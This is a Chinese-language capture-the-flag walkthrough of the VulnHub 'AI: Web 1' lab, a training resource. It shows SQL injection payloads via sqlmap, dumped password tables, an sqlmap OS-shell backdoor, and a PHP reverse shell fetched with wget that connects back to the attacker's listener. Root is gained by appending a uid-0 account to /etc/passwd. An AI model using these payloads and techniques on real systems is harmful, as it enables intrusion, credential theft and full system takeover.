文章目录
靶机概况
下载地址
https://www.vulnhub.com/entry/ai-web-1,353/
靶机描述
Description
Difficulty: Intermediate
Network: DHCP (Automatically assign)
Network Mode: NAT
This box is designed to test skills of penetration tester. The goal is simple. Get flag from /root/flag.txt. Enumerate the box, get low privileged shell and then escalate privilege to root. For any hint please tweet on @arif_xpress
难度:中级
网络:DHCP(自动分配)
网络模式:NAT
这个盒子是为了测试渗透测试员的技能而设计的。目标很简单。从 /root/flag.txt 获取标志。枚举该框,获取低权限 shell,然后将权限提升到 root。对于任何提示,请在@arif_xpress 上发推文
靶机信息
靶机界面
网卡信息
| 网卡信息 | 说明 |
|---|---|
| 网卡模式 | NAT |
| MAC 地址 | 00:0C:29:93:FE:B3 |
信息收集
主机发现
root💀kali)-[~/Desktop]
└─# arp-scan -I eth0 192.168.50.0/24 >web1.ip
┌──(root💀kali)-[~/Desktop]
└─# cat web1.ip | grep -i "00:0C:29:93:FE:B3"
192.168.50.128 00:0c:29:93:fe:b3 VMware, Inc.
端口扫描
命令过程
(root💀kali)-[~/Desktop]
└─# nmap -A -p- 192.168.50.128 -oN nmap.A
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-03 13:41 EDT
Nmap scan report for bogon (192.168.50.128)
Host is up (0.00082s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd
| http-robots.txt: 2 disallowed entries
|_/m3diNf0/ /se3reTdir777/uploads/
|_http-server-header: Apache
|_http-title: AI Web 1.0
MAC Address: 00:0C:29:93:FE:B3 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.82 ms bogon (192.168.50.128)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.83 seconds
端口详情
| PORT | STATE | SERVICE | VERSION |
|---|---|---|---|
| 80/tcp | open | http | Apache httpd |
网站信息
网站首页
目录爆破
(root💀kali)-[~/Desktop]
└─# dirb http://192.168.50.128
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Apr 5 19:51:38 2022
URL_BASE: http://192.168.50.128/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.50.128/ ----
+ http://192.168.50.128/index.html (CODE:200|SIZE:141)
+ http://192.168.50.128/robots.txt (CODE:200|SIZE:82)
+ http://192.168.50.128/server-status (CODE:403|SIZE:222)
-----------------
END_TIME: Tue Apr 5 19:51:43 2022
DOWNLOADED: 4612 - FOUND: 3
发现三个网页
http://192.168.50.128/index.html
http://192.168.50.128/robots.txt
http://192.168.50.128/server-status
访问一下
http://192.168.50.128/index.html
http://192.168.50.128/robots.txt
http://192.168.50.128/m3diNf0/
http://192.168.50.128/se3reTdir777/uploads/
http://192.168.50.128/server-status
http://192.168.50.128/m3diNf0/
http://192.168.50.128/se3reTdir777/uploads/
se3reTdir777 目录
http://192.168.50.128/se3reTdir777/
敏感目录扫描
m3diNf0目录
(root💀kali)-[~/Desktop]
└─# dirb http://192.168.50.128/m3diNf0/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Apr 3 14:40:01 2022
URL_BASE: http://192.168.50.128/m3diNf0/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.50.128/m3diNf0/ ----
+ http://192.168.50.128/m3diNf0/info.php (CODE:200|SIZE:84266)
-----------------
END_TIME: Sun Apr 3 14:40:05 2022
DOWNLOADED: 4612 - FOUND: 1
info.php页面
http://192.168.50.128/m3diNf0/info.php
User/Group www-data(33)/33
Server Root /etc/apache2
DOCUMENT_ROOT /home/www/html/web1x443290o2sdf92213
CONTEXT_DOCUMENT_ROOT /home/www/html/web1x443290o2sdf92213
se3reTdir777目录
http://192.168.50.128/se3reTdir777/
root💀kali)-[~/Desktop]
└─# dirb http://192.168.50.128/se3reTdir777/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Apr 3 14:46:09 2022
URL_BASE: http://192.168.50.128/se3reTdir777/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.50.128/se3reTdir777/ ----
+ http://192.168.50.128/se3reTdir777/index.php (CODE:200|SIZE:1228)
==> DIRECTORY: http://192.168.50.128/se3reTdir777/uploads/
---- Entering directory: http://192.168.50.128/se3reTdir777/uploads/ ----
-----------------
END_TIME: Sun Apr 3 14:46:19 2022
DOWNLOADED: 9224 - FOUND: 1
http://192.168.50.128/se3reTdir777/index.php
漏洞映射
SQLI
(root💀kali)-[~]
└─# sqlmap -u "http://192.168.50.128/se3reTdir777/" --data "uid=1&Operation=Submit"
___
__H__
___ ___[(]_____ ___ ___ {1.5.6#stable}
|_ -| . ['] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:01:07 /2022-04-05/
[15:01:08] [INFO] resuming back-end DBMS 'mysql'
[15:01:08] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (POST)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: uid=1' AND EXTRACTVALUE(3611,CONCAT(0x5c,0x71707a7671,(SELECT (ELT(3611=3611,1))),0x716b7a7071)) AND 'vRtd'='vRtd&Operation=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uid=1' AND (SELECT 4991 FROM (SELECT(SLEEP(5)))lASY) AND 'rpte'='rpte&Operation=Submit
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: uid=1' UNION ALL SELECT NULL,NULL,CONCAT(0x71707a7671,0x635570486f4450564d59484a7977534d4566766454627355655277737a626b534d7a434d59786864,0x716b7a7071)-- -&Operation=Submit
---
[15:01:08] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.1
[15:01:08] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.50.128'
[15:01:08] [WARNING] your sqlmap version is outdated
[*] ending @ 15:01:08 /2022-04-05/
渗透过程
SQLI漏洞利用
查询数据
| 参数 |
|---|
| –current-db |
| -D “aiweb1” --tabales |
| -D “aiweb” --dump |
┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.50.128/se3reTdir777/" --data "uid=1&Operation=Submit" --current-db
___
__H__
___ ___[.]_____ ___ ___ {1.5.5#stable}
|_ -| . ["] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:04:01 /2022-04-05/
[08:04:01] [INFO] resuming back-end DBMS 'mysql'
[08:04:01] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: uid=1' OR NOT 3245=3245#&Operation=Submit
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: uid=1' AND GTID_SUBSET(CONCAT(0x716b707a71,(SELECT (ELT(4512=4512,1))),0x7170717871),4512)-- CEun&Operation=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uid=1' AND (SELECT 3172 FROM (SELECT(SLEEP(5)))uyYv)-- EcBM&Operation=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: uid=1' UNION ALL SELECT NULL,NULL,CONCAT(0x716b707a71,0x73614d58526d67785061444d7a7a5976564e507345426f5842416b4e744161716477465162564856,0x7170717871)#&Operation=Submit
---
[08:04:02] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[08:04:02] [INFO] fetching current database
current database: 'aiweb1'
[08:04:02] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.50.128'
[08:04:02] [WARNING] your sqlmap version is outdated
[*] ending @ 08:04:02 /2022-04-05/
┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.50.128/se3reTdir777/" --data "uid=1&Operation=Submit" -D "aiweb1" --tables
___
__H__
___ ___[(]_____ ___ ___ {1.5.5#stable}
|_ -| . [.] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:05:18 /2022-04-05/
[08:05:18] [INFO] resuming back-end DBMS 'mysql'
[08:05:18] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: uid=1' OR NOT 3245=3245#&Operation=Submit
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: uid=1' AND GTID_SUBSET(CONCAT(0x716b707a71,(SELECT (ELT(4512=4512,1))),0x7170717871),4512)-- CEun&Operation=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uid=1' AND (SELECT 3172 FROM (SELECT(SLEEP(5)))uyYv)-- EcBM&Operation=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: uid=1' UNION ALL SELECT NULL,NULL,CONCAT(0x716b707a71,0x73614d58526d67785061444d7a7a5976564e507345426f5842416b4e744161716477465162564856,0x7170717871)#&Operation=Submit
---
[08:05:18] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[08:05:18] [INFO] fetching tables for database: 'aiweb1'
Database: aiweb1
[2 tables]
+------------+
| user |
| systemUser |
+------------+
[08:05:18] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.50.128'
[08:05:18] [WARNING] your sqlmap version is outdated
[*] ending @ 08:05:18 /2022-04-05/
(root💀kali)-[~]
└─# sqlmap -u "http://192.168.50.128/se3reTdir777/" --data "uid=1&Operation=Submit" -D "aiweb1" -T "user" --dump
___
__H__
___ ___[,]_____ ___ ___ {1.5.5#stable}
|_ -| . [(] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:07:46 /2022-04-05/
[08:07:47] [INFO] resuming back-end DBMS 'mysql'
[08:07:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: uid=1' OR NOT 3245=3245#&Operation=Submit
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: uid=1' AND GTID_SUBSET(CONCAT(0x716b707a71,(SELECT (ELT(4512=4512,1))),0x7170717871),4512)-- CEun&Operation=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uid=1' AND (SELECT 3172 FROM (SELECT(SLEEP(5)))uyYv)-- EcBM&Operation=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: uid=1' UNION ALL SELECT NULL,NULL,CONCAT(0x716b707a71,0x73614d58526d67785061444d7a7a5976564e507345426f5842416b4e744161716477465162564856,0x7170717871)#&Operation=Submit
---
[08:07:47] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[08:07:47] [INFO] fetching columns for table 'user' in database 'aiweb1'
[08:07:47] [INFO] fetching entries for table 'user' in database 'aiweb1'
Database: aiweb1
Table: user
[3 entries]
+----+----------+-----------+
| id | lastName | firstName |
+----+----------+-----------+
| 1 | admin | admin |
| 2 | root | root |
| 3 | mysql | mysql |
+----+----------+-----------+
[08:07:47] [INFO] table 'aiweb1.`user`' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.50.128/dump/aiweb1/user.csv'
[08:07:47] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.50.128'
[08:07:47] [WARNING] your sqlmap version is outdated
[*] ending @ 08:07:47 /2022-04-05/
─(root💀kali)-[~]
└─# sqlmap -u "http://192.168.50.128/se3reTdir777/" --data "uid=1&Operation=Submit" -D "aiweb1" -T "systemUser" --dump
___
__H__
___ ___[(]_____ ___ ___ {1.5.5#stable}
|_ -| . [.] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:11:29 /2022-04-05/
[08:11:29] [INFO] resuming back-end DBMS 'mysql'
[08:11:29] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: uid=1' OR NOT 3245=3245#&Operation=Submit
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: uid=1' AND GTID_SUBSET(CONCAT(0x716b707a71,(SELECT (ELT(4512=4512,1))),0x7170717871),4512)-- CEun&Operation=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uid=1' AND (SELECT 3172 FROM (SELECT(SLEEP(5)))uyYv)-- EcBM&Operation=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: uid=1' UNION ALL SELECT NULL,NULL,CONCAT(0x716b707a71,0x73614d58526d67785061444d7a7a5976564e507345426f5842416b4e744161716477465162564856,0x7170717871)#&Operation=Submit
---
[08:11:29] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[08:11:29] [INFO] fetching columns for table 'systemUser' in database 'aiweb1'
[08:11:29] [INFO] fetching entries for table 'systemUser' in database 'aiweb1'
[08:11:29] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: aiweb1
Table: systemUser
[3 entries]
+----+----------------------------------------------+-----------+
| id | password | userName |
+----+----------------------------------------------+-----------+
| 1 | RmFrZVVzZXJQYXNzdzByZA== | t00r |
| 2 | TXlFdmlsUGFzc19mOTA4c2RhZjlfc2FkZmFzZjBzYQ== | aiweb1pwn |
| 3 | TjB0VGhpczBuZUFsczA= | u3er |
+----+----------------------------------------------+-----------+
[08:11:33] [INFO] table 'aiweb1.systemUser' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.50.128/dump/aiweb1/systemUser.csv'
[08:11:33] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.50.128'
[08:11:33] [WARNING] your sqlmap version is outdated
[*] ending @ 08:11:33 /2022-04-05/
msfconsle
msf6 > sqlmap -u "http://192.168.50.128/se3reTdir777/" --data "uid=1&Operation=Submit" --os-shell
[*] exec: sqlmap -u "http://192.168.50.128/se3reTdir777/" --data "uid=1&Operation=Submit" --os-shell
___
__H__
___ ___[(]_____ ___ ___ {1.5.5#stable}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 07:47:34 /2022-04-05/
[07:47:35] [INFO] resuming back-end DBMS 'mysql'
[07:47:35] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: uid=1' OR NOT 3245=3245#&Operation=Submit
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: uid=1' AND GTID_SUBSET(CONCAT(0x716b707a71,(SELECT (ELT(4512=4512,1))),0x7170717871),4512)-- CEun&Operation=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uid=1' AND (SELECT 3172 FROM (SELECT(SLEEP(5)))uyYv)-- EcBM&Operation=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: uid=1' UNION ALL SELECT NULL,NULL,CONCAT(0x716b707a71,0x73614d58526d67785061444d7a7a5976564e507345426f5842416b4e744161716477465162564856,0x7170717871)#&Operation=Submit
---
[07:47:35] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[07:47:35] [INFO] going to use a web backdoor for command prompt
[07:47:35] [INFO] fingerprinting the back-end DBMS operating system
[07:47:35] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
[07:47:54] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2
please provide a comma separate list of absolute directory paths: /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/
[07:55:23] [WARNING] unable to automatically parse any web server path
[07:55:24] [INFO] trying to upload the file stager on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/' via LIMIT 'LINES TERMINATED BY' method
[07:55:24] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[07:55:24] [INFO] the file stager has been successfully uploaded on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/' - http://192.168.50.128:80/se3reTdir777/uploads/tmpunxnh.php
[07:55:24] [INFO] the backdoor has been successfully uploaded on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/' - http://192.168.50.128:80/se3reTdir777/uploads/tmpboona.php
[07:55:24] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
查看我是谁
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'www-data'
os-shell> id
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
创建一个名为webshell.php的文件
┌──(root💀kali)-[~/Desktop]
└─# cat webshell.php
<?php
$sock=fsockopen("192.168.50.129",8888);
exec("/bin/sh -i <&3 >&3 2>&3");
?>
使用python搭建一个简易的服务器
python2内置了一个简单的HTTP服务器,只需要在命令行下面敲一行命令,一个HTTP服务器就搭建起来了
python -m SimpleHTTPServer 9966
#9966为端口号,可自己指定
python3 python2中的SimpleHTTPServer模块已合并到Python 3中,当将源转换为Python 3的http.server
python -m http.server 9966
#9966为端口号,可自己指定
我这里python版本为2.7.18,所以使用python2的方法搭建
#注意:这里的服务器搭建好后访问网页的根目录为你现在的路径,例如我这里就是 /Desktop
┌──(root💀kali)-[~/Desktop]
└─# python -m SimpleHTTPServer 9966
Serving HTTP on 0.0.0.0 port 9966 ...
此时简易服务器已搭建完成,接下来打开网页,访问本机,查看搭建是否成功
搭建成功,我们刚刚创建的文件已经可以下载
下载文件到靶机
回到我们控制目标shell的窗口,下载文件
http://192.168.50.129:9966/webshell.php
os-shell> wget -S http://192.168.50.129:9966/webshell.php
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
--2022-04-05 15:50:12-- http://192.168.50.129:9966/webshell.php
Connecting to 192.168.50.129:9966... connected.
HTTP request sent, awaiting response...
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/2.7.18
Date: Tue, 05 Apr 2022 23:10:37 GMT
Content-type: application/octet-stream
Content-Length: 82
Last-Modified: Tue, 05 Apr 2022 22:38:11 GMT
Length: 82 [application/octet-stream]
Saving to: 'webshell.php'
0K 100% 9.22M=0s
2022-04-05 15:50:12 (9.22 MB/s) - 'webshell.php' saved [82/82]
---
有时候可能会出现异常,多试几次就可以了。
再打开一个终端,对8888端口进行监听
(root💀kali)-[~/Desktop]
└─# nc -lvp 8888 126 ⨯
listening on [any] 8888 ...
运行上传的文件
os-shell> php webshell.php
do you want to retrieve the command standard output? [Y/n/a] y
提权
先使用python转换成交互式shell,这样看着更舒服
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$
发现当前用户不是root用户但是这个用户可以对/etc/passwd 文件进行写入权限
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
我们尝试添加一个用户登录,因为写入的时候密码是加密的,所以要先加密密码:
openssl passwd -1 -salt web1 123456 //用openssl生成用户,用户名为web1 ,密码为 123456
$1$web1$ZrYgDZgZpLlsnVlxUaZwh/ //生成后/etc/passwd储存用户格式的文件
然后再来写入密码,切换刚创建的用户
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$ openssl passwd -1 -salt web1 123456
<dir777/uploads$ openssl passwd -1 -salt web1 123456
$1$web1$ZrYgDZgZpLlsnVlxUaZwh/
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$ echo 'web1:$1$web1$ZrYgDZgZpLlsnVlxUaZwh/:0:0::/root:/bin/bash'>>/etc/passwd
<gZpLlsnVlxUaZwh/:0:0::/root:/bin/bash'>>/etc/passwd
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$ su web1
<web1x443290o2sdf92213/se3reTdir777/uploads$ su web1
Password: 123456
查看权限,已经是root权限,并且成功拿取到flag
root@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads# id
id
uid=0(root) gid=0(root) groups=0(root)
root@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads# ls
ls
shell.php tmpbgvue.php tmpuopff.php webshell.php
root@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads# cd /root
<eb1x443290o2sdf92213/se3reTdir777/uploads# cd /root
root@aiweb1:~# ls
ls
flag.txt
root@aiweb1:~# cat flag.txt
cat flag.txt
####################################################
# #
# AI: WEB 1.0 #
# #
# Congratulation!!! #
# #
# Thank you for penetrate my system. #
# #
# Hope you enjoyed this. #
# #
# #
# flag{cbe5831d864cbc2a104e2c2b9dfb50e5acbdee71} #
# #
####################################################
2376
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
